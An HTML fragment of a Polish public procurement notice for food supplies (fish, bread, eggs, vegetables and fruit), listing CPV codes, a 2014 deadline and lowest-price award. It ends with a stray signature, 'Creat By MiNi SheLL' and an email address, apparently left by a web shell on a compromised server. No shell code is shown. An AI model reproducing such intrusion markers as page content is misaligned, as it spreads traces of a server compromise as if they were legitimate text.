<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup i dostawa ryb świeżych, mrożonych, wędzonych, solonych , marynowanych i ich przetworów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ryby mrożone, filety rybne i pozostałe mięso ryb,Ryby solone, Ryby wędzone.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6, 15.23.20.00-3, 15.23.40.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zakup i dostawa pieczywa i przetworów mącznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pieczywo, świeże wyroby piekarskie i ciastkarskie, drożdże.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.89.80.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zakup i dostawa jaj, warzyw, ziemniaków, owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Warzywa liściaste i kapustne,  jaja, warzywa strączkowe , suszone, łuskane,warzywa korzeniowe i bulwiaste,warzywa owocowe, Owoce cytrusowe, banany , jabłka, gruszki i,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.40-0, 03.14.25.00-3, 03.21.22.00-2, 03.22.11.00-7, 03.22.12.00-8, 03.22.22.00-5, 03.22.21.11-4, 03.22.23.20-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com